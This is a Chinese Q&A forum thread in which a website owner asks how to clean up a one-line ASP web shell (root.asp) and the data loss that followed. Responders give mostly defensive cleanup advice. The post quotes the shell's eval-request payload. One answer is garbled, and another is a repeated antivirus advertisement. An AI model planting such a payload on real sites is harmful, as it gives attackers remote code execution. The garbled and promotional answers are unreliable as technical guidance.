网站中了一句话木马,木马名称是root.asp。高分求解决方法。跪求了.. 100
网站中了一句话木马,木马名称是root.asp。木马里面代码是fuck<%evalrequest("seo")%>。ftp上的root.asp已经找到删除了、但是网站还是...
网站中了一句话木马,木马名称是root.asp。木马里面代码是fuck <%eval request("seo")%>。ftp上的root.asp已经找到删除了、但是网站还是有问题,上传的新闻还有一些部门都会慢慢的减少,空间商恢复过几次数据库数据、但是都是好了两天就不行了。数据一直在丢失,谁能告诉我怎么解决??网站ftp文件我已经替换成了最原始的文件,我觉得是数据库的问题。求大神帮帮看是什么问题、谢啦!!!解决了可以加分、
展开
展开全部
这是个把vbs语句当参数传递执行,可能还有其它后门。要么仔细看下所有目录下的每个文件,有没多出文件,要么只保留上传图片和数据库,其它删掉,把本地网站重新上传,
有这个文件存在,证明网站或服务器存在问题,
跟空间服务商联系帮忙检查一下日志,看是自己网站的漏洞还是同一个服务器上其它网站的问题?
看网站里所用在线编辑器是否有问题,默认的密码改掉了么,还有无组件上传类,比如上传组件一般都叫update.asp,改写类中变量函数名成自己的。
跟空间服务商联系,把上传目录的vbs执行权限去掉。
有这个文件存在,证明网站或服务器存在问题,
跟空间服务商联系帮忙检查一下日志,看是自己网站的漏洞还是同一个服务器上其它网站的问题?
看网站里所用在线编辑器是否有问题,默认的密码改掉了么,还有无组件上传类,比如上传组件一般都叫update.asp,改写类中变量函数名成自己的。
跟空间服务商联系,把上传目录的vbs执行权限去掉。
更多追问追答
追问
我把最原始的文件上传了、有漏洞应该不会有木马了吧?现在数据库有问题、以前备份有几十m现在只有几m了。如果说我找到最原始的数据库数据、数据库中的木马有可能清除掉么?
追答
小网站挂码不是多严重的事,经常可能遇到,页面文件.asp.js.html清掉,换成本地的就可以了,
数据库只是存放数据,一般没有可执行内容,数据库大小也没必要纠节,注意用户表有没有多出记录。
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
一句话木马插入一些ASP文件是相似的代码“执行功能允许执行任意命令,客户端的连接可以上传ASP木马的秘密被发现,反病毒软件是不易ASP木马较大,不可避免地杀,但用起来方便。为例,一套共同的ASP木马软件是一家集一句话木马的客户端和ASP木马,他们可以使用百度搜索
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
建议你彻底检查一下程序吧 把不熟悉的文件 都删除 记得备份!
追问
我对比过以前的程序文件、现在的比以前的少了很多、就多了一个root。asp,这个文件,网站是php编写的。现在主要问题是新闻在逐渐减少
追答
以前没有备份吗
除了数据库 文件全删了 把以前没挂马的备份传上去
然后在一点一点检查
也可以在网上找个 木马追踪和篡改检查两个程序 检查一下
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
这类型的木马有很多
建议你使用腾讯电脑管家,它集合木马、杀毒于一身,更有全国最大最全的安全库。
另外,在国际权威的安全软件评测机构AV-Comparatives官网正式发布的2013年3月《恶意软件检测率测试》评测结果中,腾讯电脑管家与金山毒霸并列全球第二位,99.6%的超高检出率仅次于GDATA2013,低误报率更是全国最优。
解决步骤:
1、请全盘进行木马以及病毒扫描
2、找到工具箱里的顽固木马克星,再次查杀。
3、使用电脑加速功能,关闭不需要的启动项,以及开启所有防护。
OK,搞定。
建议你使用腾讯电脑管家,它集合木马、杀毒于一身,更有全国最大最全的安全库。
另外,在国际权威的安全软件评测机构AV-Comparatives官网正式发布的2013年3月《恶意软件检测率测试》评测结果中,腾讯电脑管家与金山毒霸并列全球第二位,99.6%的超高检出率仅次于GDATA2013,低误报率更是全国最优。
解决步骤:
1、请全盘进行木马以及病毒扫描
2、找到工具箱里的顽固木马克星,再次查杀。
3、使用电脑加速功能,关闭不需要的启动项,以及开启所有防护。
OK,搞定。
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
更多回答(2)
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
